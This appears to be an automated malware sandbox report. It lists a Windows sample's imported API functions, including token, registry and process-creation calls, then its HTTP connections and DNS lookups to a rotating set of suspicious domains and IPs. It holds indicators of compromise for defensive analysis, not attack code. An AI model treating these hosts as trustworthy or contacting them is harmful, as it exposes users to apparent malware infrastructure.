GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 06:31:32.047560930 CET | 49710 | 80 | 192.168.2.8 | 3.33.130.190
Jan 11, 2025 06:31:32.052403927 CET | 80 | 49710 | 3.33.130.190 | 192.168.2.8
Jan 11, 2025 06:31:32.052582026 CET | 49710 | 80 | 192.168.2.8 | 3.33.130.190
Jan 11, 2025 06:31:32.060307026 CET | 49710 | 80 | 192.168.2.8 | 3.33.130.190
Jan 11, 2025 06:31:32.065146923 CET | 80 | 49710 | 3.33.130.190 | 192.168.2.8
Jan 11, 2025 06:31:40.439129114 CET | 80 | 49710 | 3.33.130.190 | 192.168.2.8
Jan 11, 2025 06:31:40.439147949 CET | 80 | 49710 | 3.33.130.190 | 192.168.2.8
Jan 11, 2025 06:31:40.439392090 CET | 49710 | 80 | 192.168.2.8 | 3.33.130.190
Jan 11, 2025 06:31:40.443933964 CET | 49710 | 80 | 192.168.2.8 | 3.33.130.190
Jan 11, 2025 06:31:40.448750019 CET | 80 | 49710 | 3.33.130.190 | 192.168.2.8
Jan 11, 2025 06:31:59.103537083 CET | 49714 | 80 | 192.168.2.8 | 38.47.232.196
Jan 11, 2025 06:31:59.108433962 CET | 80 | 49714 | 38.47.232.196 | 192.168.2.8
Jan 11, 2025 06:31:59.108551025 CET | 49714 | 80 | 192.168.2.8 | 38.47.232.196
Jan 11, 2025 06:31:59.119663000 CET | 49714 | 80 | 192.168.2.8 | 38.47.232.196
Jan 11, 2025 06:31:59.124500036 CET | 80 | 49714 | 38.47.232.196 | 192.168.2.8
Jan 11, 2025 06:32:00.626224995 CET | 49714 | 80 | 192.168.2.8 | 38.47.232.196
Jan 11, 2025 06:32:00.671559095 CET | 80 | 49714 | 38.47.232.196 | 192.168.2.8
Jan 11, 2025 06:32:01.155564070 CET | 80 | 49714 | 38.47.232.196 | 192.168.2.8
Jan 11, 2025 06:32:01.155720949 CET | 49714 | 80 | 192.168.2.8 | 38.47.232.196
Jan 11, 2025 06:32:01.646420002 CET | 49715 | 80 | 192.168.2.8 | 38.47.232.196
Jan 11, 2025 06:32:01.651307106 CET | 80 | 49715 | 38.47.232.196 | 192.168.2.8
Jan 11, 2025 06:32:01.651396990 CET | 49715 | 80 | 192.168.2.8 | 38.47.232.196
Jan 11, 2025 06:32:01.666533947 CET | 49715 | 80 | 192.168.2.8 | 38.47.232.196
Jan 11, 2025 06:32:01.671412945 CET | 80 | 49715 | 38.47.232.196 | 192.168.2.8
Jan 11, 2025 06:32:03.173162937 CET | 49715 | 80 | 192.168.2.8 | 38.47.232.196
Jan 11, 2025 06:32:03.219631910 CET | 80 | 49715 | 38.47.232.196 | 192.168.2.8
Jan 11, 2025 06:32:03.703644991 CET | 80 | 49715 | 38.47.232.196 | 192.168.2.8
Jan 11, 2025 06:32:03.703828096 CET | 49715 | 80 | 192.168.2.8 | 38.47.232.196
Jan 11, 2025 06:32:04.192682028 CET | 49716 | 80 | 192.168.2.8 | 38.47.232.196
Jan 11, 2025 06:32:04.197649002 CET | 80 | 49716 | 38.47.232.196 | 192.168.2.8
Jan 11, 2025 06:32:04.197752953 CET | 49716 | 80 | 192.168.2.8 | 38.47.232.196
Jan 11, 2025 06:32:04.208389997 CET | 49716 | 80 | 192.168.2.8 | 38.47.232.196
Jan 11, 2025 06:32:04.213239908 CET | 80 | 49716 | 38.47.232.196 | 192.168.2.8
Jan 11, 2025 06:32:04.213304996 CET | 80 | 49716 | 38.47.232.196 | 192.168.2.8
                                                                    Jan 11, 2025 06:32:05.720163107 CET4971680192.168.2.838.47.232.196
                                                                    Jan 11, 2025 06:32:05.767541885 CET804971638.47.232.196192.168.2.8
                                                                    Jan 11, 2025 06:32:06.285603046 CET804971638.47.232.196192.168.2.8
                                                                    Jan 11, 2025 06:32:06.285676956 CET4971680192.168.2.838.47.232.196
                                                                    Jan 11, 2025 06:32:06.739291906 CET4971780192.168.2.838.47.232.196
                                                                    Jan 11, 2025 06:32:06.744144917 CET804971738.47.232.196192.168.2.8
                                                                    Jan 11, 2025 06:32:06.744342089 CET4971780192.168.2.838.47.232.196
                                                                    Jan 11, 2025 06:32:06.753786087 CET4971780192.168.2.838.47.232.196
                                                                    Jan 11, 2025 06:32:06.758563042 CET804971738.47.232.196192.168.2.8
                                                                    Jan 11, 2025 06:32:08.797334909 CET804971738.47.232.196192.168.2.8
                                                                    Jan 11, 2025 06:32:08.797657013 CET4971780192.168.2.838.47.232.196
                                                                    Jan 11, 2025 06:32:08.798890114 CET4971780192.168.2.838.47.232.196
                                                                    Jan 11, 2025 06:32:08.803680897 CET804971738.47.232.196192.168.2.8
                                                                    Jan 11, 2025 06:32:13.847774982 CET4971880192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:13.853022099 CET8049718217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:13.853224039 CET4971880192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:13.866683006 CET4971880192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:13.871493101 CET8049718217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:14.495951891 CET8049718217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:14.495975018 CET8049718217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:14.496048927 CET4971880192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:15.380177021 CET4971880192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:16.395328999 CET4971980192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:16.400371075 CET8049719217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:16.400469065 CET4971980192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:16.412672997 CET4971980192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:16.417519093 CET8049719217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:17.062359095 CET8049719217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:17.062387943 CET8049719217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:17.062496901 CET4971980192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:17.923496962 CET4971980192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:18.942923069 CET4972080192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:18.947873116 CET8049720217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:18.948008060 CET4972080192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:18.963241100 CET4972080192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:18.968154907 CET8049720217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:18.968297005 CET8049720217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:19.589622021 CET8049720217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:19.589703083 CET8049720217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:19.589883089 CET4972080192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:20.470098019 CET4972080192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:21.488651037 CET4972180192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:21.493556976 CET8049721217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:21.493635893 CET4972180192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:21.500574112 CET4972180192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:21.505424976 CET8049721217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:22.136074066 CET8049721217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:22.136101961 CET8049721217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:22.136154890 CET8049721217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:22.136276007 CET4972180192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:22.136276007 CET4972180192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:22.138978004 CET4972180192.168.2.8217.160.0.207
                                                                    Jan 11, 2025 06:32:22.143773079 CET8049721217.160.0.207192.168.2.8
                                                                    Jan 11, 2025 06:32:27.474062920 CET4972280192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:27.479115009 CET804972254.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:27.479242086 CET4972280192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:27.489717960 CET4972280192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:27.494600058 CET804972254.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:28.076931000 CET804972254.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:28.076950073 CET804972254.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:28.077068090 CET4972280192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:29.001240969 CET4972280192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:30.020100117 CET4972380192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:30.025069952 CET804972354.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:30.025209904 CET4972380192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:30.035326004 CET4972380192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:30.040153027 CET804972354.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:30.615391970 CET804972354.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:30.615487099 CET804972354.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:30.615567923 CET4972380192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:31.548389912 CET4972380192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:32.567142963 CET4972480192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:32.572042942 CET804972454.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:32.572208881 CET4972480192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:32.584050894 CET4972480192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:32.589011908 CET804972454.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:32.589049101 CET804972454.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:33.174417019 CET804972454.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:33.174483061 CET804972454.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:33.174751997 CET4972480192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:34.095170975 CET4972480192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:35.120641947 CET4972580192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:35.125529051 CET804972554.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:35.125607967 CET4972580192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:35.133351088 CET4972580192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:35.138118982 CET804972554.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:35.709069014 CET804972554.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:35.709090948 CET804972554.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:35.709266901 CET4972580192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:35.711860895 CET4972580192.168.2.854.67.87.110
                                                                    Jan 11, 2025 06:32:35.716696978 CET804972554.67.87.110192.168.2.8
                                                                    Jan 11, 2025 06:32:41.150513887 CET4972680192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:41.155347109 CET804972635.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:41.155430079 CET4972680192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:41.166868925 CET4972680192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:41.171668053 CET804972635.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:42.302730083 CET804972635.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:42.302755117 CET804972635.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:42.302772999 CET804972635.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:42.302828074 CET4972680192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:42.673336029 CET4972680192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:43.692039013 CET4972780192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:43.697490931 CET804972735.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:43.697601080 CET4972780192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:43.709134102 CET4972780192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:43.714788914 CET804972735.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:44.841963053 CET804972735.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:44.842019081 CET804972735.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:44.842061996 CET804972735.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:44.842116117 CET4972780192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:44.842117071 CET4972780192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:45.220666885 CET4972780192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:46.240266085 CET4972880192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:46.245440006 CET804972835.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:46.245552063 CET4972880192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:46.257361889 CET4972880192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:46.262387991 CET804972835.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:46.262535095 CET804972835.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:47.458950996 CET804972835.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:47.458973885 CET804972835.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:47.458993912 CET804972835.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:47.459156036 CET4972880192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:47.767055035 CET4972880192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:48.786011934 CET4972980192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:48.791069984 CET804972935.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:48.791241884 CET4972980192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:48.798449039 CET4972980192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:48.803345919 CET804972935.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:49.940907955 CET804972935.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:49.940936089 CET804972935.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:49.940949917 CET804972935.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:49.940963030 CET804972935.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:49.941126108 CET4972980192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:49.941224098 CET4972980192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:49.945931911 CET4972980192.168.2.835.156.117.131
                                                                    Jan 11, 2025 06:32:49.950822115 CET804972935.156.117.131192.168.2.8
                                                                    Jan 11, 2025 06:32:55.072422981 CET4973080192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:32:55.077641010 CET8049730161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:32:55.077708006 CET4973080192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:32:55.164902925 CET4973080192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:32:55.170633078 CET8049730161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:32:55.715848923 CET8049730161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:32:55.715867996 CET8049730161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:32:55.715882063 CET8049730161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:32:55.716032028 CET4973080192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:32:56.673203945 CET4973080192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:32:57.791033030 CET4973180192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:32:57.795967102 CET8049731161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:32:57.796077013 CET4973180192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:32:57.899036884 CET4973180192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:32:57.905044079 CET8049731161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:32:58.426966906 CET8049731161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:32:58.426983118 CET8049731161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:32:58.426994085 CET8049731161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:32:58.427050114 CET4973180192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:32:58.427159071 CET4973180192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:32:59.407748938 CET4973180192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:33:00.426839113 CET4973280192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:33:00.432030916 CET8049732161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:33:00.432223082 CET4973280192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:33:00.443574905 CET4973280192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:33:00.448533058 CET8049732161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:33:00.448704004 CET8049732161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:33:01.068217993 CET8049732161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:33:01.068237066 CET8049732161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:33:01.068315029 CET4973280192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:33:01.070286989 CET8049732161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:33:01.070348024 CET4973280192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:33:01.954783916 CET4973280192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:33:02.974371910 CET4973380192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:33:02.979302883 CET8049733161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:33:02.979377985 CET4973380192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:33:02.987945080 CET4973380192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:33:02.992746115 CET8049733161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:33:03.593358994 CET8049733161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:33:03.593379021 CET8049733161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:33:03.593389988 CET8049733161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:33:03.593400002 CET8049733161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:33:03.593441010 CET8049733161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:33:03.593575001 CET4973380192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:33:03.593611002 CET4973380192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:33:03.598190069 CET4973380192.168.2.8161.97.142.144
                                                                    Jan 11, 2025 06:33:03.603064060 CET8049733161.97.142.144192.168.2.8
                                                                    Jan 11, 2025 06:33:08.689729929 CET4973480192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:08.694603920 CET804973485.233.160.22192.168.2.8
                                                                    Jan 11, 2025 06:33:08.694713116 CET4973480192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:08.706007957 CET4973480192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:08.710973024 CET804973485.233.160.22192.168.2.8
                                                                    Jan 11, 2025 06:33:09.301889896 CET804973485.233.160.22192.168.2.8
                                                                    Jan 11, 2025 06:33:09.301949978 CET804973485.233.160.22192.168.2.8
                                                                    Jan 11, 2025 06:33:09.302045107 CET4973480192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:10.220149994 CET4973480192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:11.238459110 CET4973580192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:11.243726969 CET804973585.233.160.22192.168.2.8
                                                                    Jan 11, 2025 06:33:11.243844032 CET4973580192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:11.255626917 CET4973580192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:11.260548115 CET804973585.233.160.22192.168.2.8
                                                                    Jan 11, 2025 06:33:11.836436987 CET804973585.233.160.22192.168.2.8
                                                                    Jan 11, 2025 06:33:11.836471081 CET804973585.233.160.22192.168.2.8
                                                                    Jan 11, 2025 06:33:11.836657047 CET4973580192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:12.766964912 CET4973580192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:13.785535097 CET4973680192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:13.790574074 CET804973685.233.160.22192.168.2.8
                                                                    Jan 11, 2025 06:33:13.790676117 CET4973680192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:13.805814028 CET4973680192.168.2.885.233.160.22
                                                                    Jan 11, 2025 06:33:13.810686111 CET804973685.233.160.22192.168.2.8
                                                                    Jan 11, 2025 06:33:13.810758114 CET804973685.233.160.22192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 06:31:32.028841972 CET | 192.168.2.8 | 1.1.1.1 | 0x683f | Standard query (0) | www.healthyloveforall.net | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:31:50.474159956 CET | 192.168.2.8 | 1.1.1.1 | 0x3f9e | Standard query (0) | www.bonusgame2024.online | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:31:58.553349972 CET | 192.168.2.8 | 1.1.1.1 | 0x7032 | Standard query (0) | www.zz82x.top | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:32:13.818082094 CET | 192.168.2.8 | 1.1.1.1 | 0x7e2 | Standard query (0) | www.ophthalmo.cloud | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:32:27.149872065 CET | 192.168.2.8 | 1.1.1.1 | 0xe19b | Standard query (0) | www.ngmr.xyz | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:32:40.724075079 CET | 192.168.2.8 | 1.1.1.1 | 0x879b | Standard query (0) | www.specialgift.asia | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:32:55.014647961 CET | 192.168.2.8 | 1.1.1.1 | 0x29b4 | Standard query (0) | www.030002803.xyz | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:33:08.614214897 CET | 192.168.2.8 | 1.1.1.1 | 0x8269 | Standard query (0) | www.2bhp.com | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:33:21.942370892 CET | 192.168.2.8 | 1.1.1.1 | 0xba2d | Standard query (0) | www.lanxuanz.tech | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:33:35.489228010 CET | 192.168.2.8 | 1.1.1.1 | 0x391b | Standard query (0) | www.astrafusion.xyz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 06:31:32.041415930 CET | 1.1.1.1 | 192.168.2.8 | 0x683f | No error (0) | www.healthyloveforall.net | healthyloveforall.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 06:31:32.041415930 CET | 1.1.1.1 | 192.168.2.8 | 0x683f | No error (0) | healthyloveforall.net | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:31:32.041415930 CET | 1.1.1.1 | 192.168.2.8 | 0x683f | No error (0) | healthyloveforall.net | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:31:50.481337070 CET | 1.1.1.1 | 192.168.2.8 | 0x3f9e | Name error (3) | www.bonusgame2024.online | none | none | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:31:59.100403070 CET | 1.1.1.1 | 192.168.2.8 | 0x7032 | No error (0) | www.zz82x.top | zz82x.top | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 06:31:59.100403070 CET | 1.1.1.1 | 192.168.2.8 | 0x7032 | No error (0) | zz82x.top | | 38.47.232.196 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:32:13.845303059 CET | 1.1.1.1 | 192.168.2.8 | 0x7e2 | No error (0) | www.ophthalmo.cloud | | 217.160.0.207 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:32:27.469769001 CET | 1.1.1.1 | 192.168.2.8 | 0xe19b | No error (0) | www.ngmr.xyz | | 54.67.87.110 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:32:41.147919893 CET | 1.1.1.1 | 192.168.2.8 | 0x879b | No error (0) | www.specialgift.asia | www.specialgift.asia.s.strikinglydns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 06:32:41.147919893 CET | 1.1.1.1 | 192.168.2.8 | 0x879b | No error (0) | www.specialgift.asia.s.strikinglydns.com | | 35.156.117.131 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:32:41.147919893 CET | 1.1.1.1 | 192.168.2.8 | 0x879b | No error (0) | www.specialgift.asia.s.strikinglydns.com | | 18.157.120.97 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:32:55.043040037 CET | 1.1.1.1 | 192.168.2.8 | 0x29b4 | No error (0) | www.030002803.xyz | | 161.97.142.144 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:33:08.685661077 CET | 1.1.1.1 | 192.168.2.8 | 0x8269 | No error (0) | www.2bhp.com | webforward.lcn.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 06:33:08.685661077 CET | 1.1.1.1 | 192.168.2.8 | 0x8269 | No error (0) | webforward.lcn.com | fwd3.hosts.co.uk | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 06:33:08.685661077 CET | 1.1.1.1 | 192.168.2.8 | 0x8269 | No error (0) | fwd3.hosts.co.uk | | 85.233.160.22 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:33:08.685661077 CET | 1.1.1.1 | 192.168.2.8 | 0x8269 | No error (0) | fwd3.hosts.co.uk | | 85.233.160.23 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 06:33:08.685661077 CET | 1.1.1.1 | 192.168.2.8 | 0x8269 | No error (0) | fwd3.hosts.co.uk | | 85.233.160.24 | A (IP address) | IN (0x0001) | false
